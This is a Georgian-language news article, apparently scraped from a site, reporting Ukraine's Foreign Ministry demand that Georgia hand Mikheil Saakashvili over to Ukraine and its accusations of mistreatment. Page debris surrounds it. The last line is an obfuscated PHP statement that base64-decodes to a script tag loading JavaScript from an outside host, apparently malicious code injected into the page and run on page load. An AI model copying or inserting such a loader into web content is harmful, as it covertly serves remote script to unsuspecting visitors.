celsiusi
ავერსი საქკაბელი
უკრაინის საგარეო საქმეთა სამინისტრომ საქართველოს მოუწოდა, დაუყოვნებლივ გადასცეს სააკაშვილი უკრაინას და პროტესტი გამოთქვა უკრაინის მოქალაქის მიმართ არაჰუმანური მოპყრობის გამო.
ამის შესახებ ნათქვამია უკრაინის საგარეო საქმეთა სამინისტროს ვებგვერდზე გამოქვეყნებულ განცხადებაში.
ოფიციალური კიევი საქართველოს მთავრობას უკრაინის მოქალაქის, მიხეილ სააკაშვილის ფსიქოლოგიურ და ფიზიკურ ძალადობაში სდებს ბრალს, მოუწოდებს თბილისს, შეწყვიტოს დამცირება და გადასცეს უკრაინას მსჯავრდებული სააკაშვილი.
„მოვუწოდებთ საქართველოს მთავრობას, შეწყვიტონ მიხეილ სააკაშვილის დამცირება და გადასცენ ის უკრაინას. ნუ ეთამაშებით ადამიანის სიცოცხლეს პოლიტიკური შურისძიების მიზნით“, – წერს უკრაინის საგარეო უწყება.
უკრაინის საგარეო საქმეთა სამინისტროს განცხადებაში ნათქვამია, რომ საქართველოს მთავრობა „საბჭოთა ენ-კა-ვე-დეს“ ყველაზე უარესი ტრადიციებით მოქმედებს, როდესაც იყენებს სააკაშვილის მიმართ „ფსიქოლოგიურ და ფიზიკურ ძალადობას, უარს ეუბნება სასწრაფო სამედიცინო დახმარებაზე, გაცნობიერებულად ქმნის მისი სიცოცხლისთვის საფრთხეს.“
უკრაინის საგარეო უწყებაში აცხადებენ, რომ ადამიანის უფლებების უხეში დარღვევა უკრაინის მოქალაქის მიმართ ეწინააღმდეგება ოფიციალური თბილისის მიერ დეკლარირებულ კურსს ევროკავშირში გაწევრიანების შესახებ და ცხადყოფს საქართველოს დემოკრატიის უკუსვლაზე.

უკრაინის საგარეო უწყება მოუწოდებს უცხო ქვეყნების მთავრობებს და საერთაშორისო ორგანიზაციებს, საჯაროდ დადგნენ სააკაშვილის დასაცავად, რომელიც საქართველოს მთავრობის მხრიდან პოლიტიკური რეპრესიების მსხვერპლი გახდა

301
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");